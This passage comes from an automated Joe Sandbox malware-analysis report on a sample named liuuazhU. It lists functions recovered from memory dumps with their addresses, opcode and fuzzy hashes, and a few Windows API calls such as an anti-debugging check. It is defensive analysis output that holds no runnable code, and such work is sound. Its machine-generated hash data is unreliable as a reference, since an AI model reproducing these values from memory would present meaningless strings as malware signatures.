                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 851181db25b1af4b240d08078f89b7538180ba9d8fe6dcfc221e0ec2691697b4
                                                                                        • Instruction ID: ab4038fc24635ae786d51cb16e7c5b27a31b12d849b6ca082905bbc66fb65e5a
                                                                                        • Opcode Fuzzy Hash: 851181db25b1af4b240d08078f89b7538180ba9d8fe6dcfc221e0ec2691697b4
                                                                                        • Instruction Fuzzy Hash: C0E0C27580C3945ED703E37098A9BD93F719B42201F05426AD405866A7DEA4888E4719
                                                                                        Function 20D13F05 Relevance: .0, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9064c6c68ce3b6c5e38ee8bd3c84d89e8ed86a0b18918f5fbdc67975aba51396
                                                                                        • Instruction ID: 4f7e6b9aeb3305fd1d71a426e4ab39499fcec460545fd7a85e89e6460f54b756
                                                                                        • Opcode Fuzzy Hash: 9064c6c68ce3b6c5e38ee8bd3c84d89e8ed86a0b18918f5fbdc67975aba51396
                                                                                        • Instruction Fuzzy Hash: A6D0173AB00108EFCB008F88EC408DDB7B6FB98221B008026E911A3220C6319821DB54
                                                                                        Function 20D11338 Relevance: .0, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bc0cd8b6d2e7b3f5117108eadd2157ca1ee4017afbe774c5d2f1bf6e3a5d2b72
                                                                                        • Instruction ID: dbeb0db8f8b8b35589db8bd9cccd8356271586e0b1a25582086b0ca78391ae05
                                                                                        • Opcode Fuzzy Hash: bc0cd8b6d2e7b3f5117108eadd2157ca1ee4017afbe774c5d2f1bf6e3a5d2b72
                                                                                        • Instruction Fuzzy Hash: 3DC022300082084EC202E3B4EC84D6A731EE780601F004230D0090632ACFB4A8CC02AC

                                                                                        Non-executed Functions

                                                                                        Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                        • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 2579439406-0
                                                                                        • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                        • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                        • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                        • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                        Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3859560861-0
                                                                                        • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                        • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                        • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                        • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                        Function 20D1D698 Relevance: 1.9, Strings: 1, Instructions: 691COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .5vq
                                                                                        • API String ID: 0-493797296
                                                                                        • Opcode ID: d5f46204ae6b751ed2572c0324e83d287783b6f047dba51b7fc562c32ccda374
                                                                                        • Instruction ID: 38923ea0af74c8a5b002b893f72bba26e350d9c4dfed6c75abc4e95e261ae5ad
                                                                                        • Opcode Fuzzy Hash: d5f46204ae6b751ed2572c0324e83d287783b6f047dba51b7fc562c32ccda374
                                                                                        • Instruction Fuzzy Hash: 18729974E012298FDB65DF69C894BDDBBB2AF89300F1081E9D40CAB254DB35AE85CF54
                                                                                        Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                        • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                        • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                        • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                        Function 20D19360 Relevance: .3, Instructions: 321COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8c2bccbeb99dd4825637a033d5cc18d47da0e57b952ae65a920094eef867fd26
                                                                                        • Instruction ID: 2f326079cc784f4801ddf33ff814784f55e725dd6dd622c43bc49578abeb33e9
                                                                                        • Opcode Fuzzy Hash: 8c2bccbeb99dd4825637a033d5cc18d47da0e57b952ae65a920094eef867fd26
                                                                                        • Instruction Fuzzy Hash: E1F1AD74E01228CFDB64CFA5C994BADBBB2BF98300F1481AAE509A7354DB355E85CF50
                                                                                        Function 2018E810 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 187acbcba5777f42e86e2ff3aa77d45794826f79140a2d9a0cb9170f63a72eaf
                                                                                        • Instruction ID: 8a0868d15264d94090d2f07acab2e57eded5201c1227ce7043a357150bf03cef
                                                                                        • Opcode Fuzzy Hash: 187acbcba5777f42e86e2ff3aa77d45794826f79140a2d9a0cb9170f63a72eaf
                                                                                        • Instruction Fuzzy Hash: ACF17E74E00228CFEB64DFA5C994BEDBBB2AF58300F1081AAE509A7355DB355E85CF50
                                                                                        Function 2018A850 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 67ccd80a90289821d1cf8dc33fd7620f99497564d6129edf0e90a3a997162d3f
                                                                                        • Instruction ID: 105cdf4cf3b361d126b94122823d1793606bf2819b2c1b26b85be44cef0b0f2a
                                                                                        • Opcode Fuzzy Hash: 67ccd80a90289821d1cf8dc33fd7620f99497564d6129edf0e90a3a997162d3f
                                                                                        • Instruction Fuzzy Hash: BEF17E74E00228CFEB64DFA5C994BDDBBB2BB98300F1081AAD519A7394DB355E85CF50
                                                                                        Function 2018DC90 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e5229c1eeeaa76a6abf71276d1388b75dff69099cc59b2e797de4357e30b30d3
                                                                                        • Instruction ID: cb1d2f86c64880ed24910c1c370b7cc65752467bd185c514f0ee9cdd484cbd05
                                                                                        • Opcode Fuzzy Hash: e5229c1eeeaa76a6abf71276d1388b75dff69099cc59b2e797de4357e30b30d3
                                                                                        • Instruction Fuzzy Hash: BDF17E74E00228CFEB64DFA5C994BDDBBB2AF98300F1085AAE509A7354DB355E85CF50
                                                                                        Function 20189CC0 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3977b0fe39358a1ff37336eceafdee11c12c31f522c4ad82bfd3be5afb1335f6
                                                                                        • Instruction ID: f3abd828285d645b37d2ad38ad5d039882b297223881cf93e048199ade04dc67
                                                                                        • Opcode Fuzzy Hash: 3977b0fe39358a1ff37336eceafdee11c12c31f522c4ad82bfd3be5afb1335f6
                                                                                        • Instruction Fuzzy Hash: E1F18E74E00228CFEB64DFA5C994BEDBBB2BB58300F1081AAE519A7354DB355E85CF50
                                                                                        Function 2018D110 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5dbc4c484e392442c61e151c6375040e95d7307d3399373198ee50ce00124936
                                                                                        • Instruction ID: d7c0b2a0e1d7d3e83aa0ea3dfe12dcdc0f63d6a57d90ea588c363dd9efa34ec2
                                                                                        • Opcode Fuzzy Hash: 5dbc4c484e392442c61e151c6375040e95d7307d3399373198ee50ce00124936
                                                                                        • Instruction Fuzzy Hash: 14F17E74E00228CFDB64DFA5C994BDDBBB2AF58300F1081AAE509A7354DB355E85CF50
                                                                                        Function 2018AE18 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d69b5c422efb5c0ef5c188439df77c0cfb1770e69f5586dd92b8007dda55155b
                                                                                        • Instruction ID: 5db60b21277b5390ed1998c1b1c06c08a054e661381f837a34ccba1f2457a290
                                                                                        • Opcode Fuzzy Hash: d69b5c422efb5c0ef5c188439df77c0cfb1770e69f5586dd92b8007dda55155b
                                                                                        • Instruction Fuzzy Hash: 93F17E74E00228CFEB64DFA5C994BDDBBB2BB98300F1085AAE509A7354DB355E85CF50
                                                                                        Function 2018E250 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8f21b715772947b89302c89917233ae25d01cc1380f4dbf81124a5f043ad8931
                                                                                        • Instruction ID: 3a3c4a3639a92c6d401f5e1a8255cfac5206891d2fe148ce4f70de7eba29ec5b
                                                                                        • Opcode Fuzzy Hash: 8f21b715772947b89302c89917233ae25d01cc1380f4dbf81124a5f043ad8931
                                                                                        • Instruction Fuzzy Hash: E0F16E74E00228CFEB64DFA5C994BDDBBB2AF58300F1085AAE509A7354DB355E85CF50
                                                                                        Function 2018A288 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b44fcf07a89d5c69845949625ff529b4883e9fe6854e64339ec09d1cb761c05c
                                                                                        • Instruction ID: b3d6826d474d3ca34a55c60d53b1f607b95d5c53ea7ba5d5939cc0ea5f2131d3
                                                                                        • Opcode Fuzzy Hash: b44fcf07a89d5c69845949625ff529b4883e9fe6854e64339ec09d1cb761c05c
                                                                                        • Instruction Fuzzy Hash: FEF17E74E00228CFEB64DFA5C994BDDBBB2BB98300F1081AAD509A7394DB355E85DF50
                                                                                        Function 2018D6D0 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a94938c1d499943fa3254b5d22e68150a9cfa428da8350af3caa0eca352566b8
                                                                                        • Instruction ID: 0a523f3f56e42b8be8c0810556237d88bacac126204326189ea81a5bc4bc7850
                                                                                        • Opcode Fuzzy Hash: a94938c1d499943fa3254b5d22e68150a9cfa428da8350af3caa0eca352566b8
                                                                                        • Instruction Fuzzy Hash: 30F17E74E01228CFEB64DFA5C994BEDBBB2AF58300F1081AAE509A7354DB355E85CF50
                                                                                        Function 201896F8 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f810c5c3cad21ec2b6ea742acb4adf7e5f1fae964537e48d86ee854f53b9e832
                                                                                        • Instruction ID: e629bf1be91d0cd092b5c72b2c3fb1db691265ac54ef8e3f71cccdee28da27f2
                                                                                        • Opcode Fuzzy Hash: f810c5c3cad21ec2b6ea742acb4adf7e5f1fae964537e48d86ee854f53b9e832
                                                                                        • Instruction Fuzzy Hash: 7FF17D74E00228CFDB64DFA5C994BEDBBB2BB98300F1481AAE509A7354DB355E85CF50
                                                                                        Function 2018CB50 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 72e2c1aba8fd0dfe431735a3618ee475f6215ae026b55608b149fa86e1413aca
                                                                                        • Instruction ID: 0b3a65235687ec2f7cdd65cc2519997035b98a3476a6e53ee059ddf3b2dea9e4
                                                                                        • Opcode Fuzzy Hash: 72e2c1aba8fd0dfe431735a3618ee475f6215ae026b55608b149fa86e1413aca
                                                                                        • Instruction Fuzzy Hash: D2F17E74E01228CFEB64DFA5C994BDDBBB2AF98300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D170E0 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7fd7ec3dfcf83c25434abc9baef2186df602e9bdd2bc4bea2e2f92dab2f477b2
                                                                                        • Instruction ID: e03064b68af91a9528002f3c1c3fce5eda2bfaade9ee509d3a65e0c677434bbd
                                                                                        • Opcode Fuzzy Hash: 7fd7ec3dfcf83c25434abc9baef2186df602e9bdd2bc4bea2e2f92dab2f477b2
                                                                                        • Instruction Fuzzy Hash: E8F18D74E01228CFDB64DFA9C994B9DBBB2BF98300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D1BCE8 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: dc036f777a207ff5ae690d304131c2c3ccb56af2716046707f34aeb0599588bf
                                                                                        • Instruction ID: 4e1c08226f3577feca587aae3bf60fe8afbbd49db510ee726796c3176bd40fea
                                                                                        • Opcode Fuzzy Hash: dc036f777a207ff5ae690d304131c2c3ccb56af2716046707f34aeb0599588bf
                                                                                        • Instruction Fuzzy Hash: AEF19D74E01228CFDB64CFA9C994B9DBBB2AF98300F1085AAE509A7354DB355E85CF50
                                                                                        Function 20D148A0 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ebdbe6fc74d78a54e0cdcf96e4b5efb8cf64d68addb4a3908aa7feaf0259eb86
                                                                                        • Instruction ID: 4d570091832e8970d60b6ab34e8dc980110c95a9f7ca23015fdc28e5a901ddb9
                                                                                        • Opcode Fuzzy Hash: ebdbe6fc74d78a54e0cdcf96e4b5efb8cf64d68addb4a3908aa7feaf0259eb86
                                                                                        • Instruction Fuzzy Hash: 81F18D74E01228CFDB64DFA5C994B9DBBB2BF58300F1081AAE509A7354EB355E85CF50
                                                                                        Function 20D17C60 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 001c7a9a8daf03af245480d29488dee2e61beaf01f97565a6577be25fab22e38
                                                                                        • Instruction ID: ecab0fab4ab649090a110814bc8267df2d64800e0bb2ff5c08dac338b5c15c35
                                                                                        • Opcode Fuzzy Hash: 001c7a9a8daf03af245480d29488dee2e61beaf01f97565a6577be25fab22e38
                                                                                        • Instruction Fuzzy Hash: D5F18D74E01228CFDB64DFA5C994BEDBBB2AF98300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D1C868 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c33800ebd7e8988f0adecd697ff63c4b1ea516c236dc1c9a0f53b9361214e55f
                                                                                        • Instruction ID: 1d7f6383ccd4728caf7fbca01075908ddb278927c375b7719b16dfe5fab6d9a7
                                                                                        • Opcode Fuzzy Hash: c33800ebd7e8988f0adecd697ff63c4b1ea516c236dc1c9a0f53b9361214e55f
                                                                                        • Instruction Fuzzy Hash: 93F18D74E01228CFDB64CFA5C994BEDBBB2AB98300F1085AAE509A7354DB355E85CF50
                                                                                        Function 20D15420 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fe16d69746e30f80c03036ecfc51952860ad8a421739b660e4b9510a35d417ba
                                                                                        • Instruction ID: 319247a696cd096f9ac548a91bb5a987a78adc87b34a4aca47393446cc42acd3
                                                                                        • Opcode Fuzzy Hash: fe16d69746e30f80c03036ecfc51952860ad8a421739b660e4b9510a35d417ba
                                                                                        • Instruction Fuzzy Hash: 1AF19D74E01228CFDB64DFA5C994BADBBB2AF98300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D1A028 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 49a974f8d8a4edf8d0f67b0d37f0594b289c1eb6612c6630d41e6f765a23317d
                                                                                        • Instruction ID: d2d9066bc2a041f17896456eab742304593ad2d2ac506e93ee1e9c3f82396180
                                                                                        • Opcode Fuzzy Hash: 49a974f8d8a4edf8d0f67b0d37f0594b289c1eb6612c6630d41e6f765a23317d
                                                                                        • Instruction Fuzzy Hash: D9F18E74E01228CFDB64CFA9C994BADBBB2BF58300F1081AAD509A7354DB355E85CF50
                                                                                        Function 20D159E0 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6314f1783185bc0edbc4741fb8d438eb26eaa9c26e5ec6d83a4a02e96e4eaae
                                                                                        • Instruction ID: baa436db606c4fd36848bdc9657705d12e433de3ff2a0e53d00299d032b34cc8
                                                                                        • Opcode Fuzzy Hash: f6314f1783185bc0edbc4741fb8d438eb26eaa9c26e5ec6d83a4a02e96e4eaae
                                                                                        • Instruction Fuzzy Hash: 0AF18D74E01228CFDB64DFA5C994BADBBB2BF98300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D1A5E8 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5720c6db288975daecc130fb00e9b249306ca9f2b313b963ff7854d7ba058e98
                                                                                        • Instruction ID: 9ab8d0889682fc3a1136322c5651bba95dee98125705b7f73402c28ac9e86b47
                                                                                        • Opcode Fuzzy Hash: 5720c6db288975daecc130fb00e9b249306ca9f2b313b963ff7854d7ba058e98
                                                                                        • Instruction Fuzzy Hash: B5F18E74E01228CFDB64CFA9C994BADBBB2BF58300F1081AAD509A7354DB355E85CF50
                                                                                        Function 20D18DA0 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 396ff4d00c58848ac350f646174db21a0a8d72b8d1ac01ce4a2de2e6234c3fa5
                                                                                        • Instruction ID: 63fe61411c5b4245d40f6bb31ff9fdf921fd68446a0385208d3283b77cd7cd79
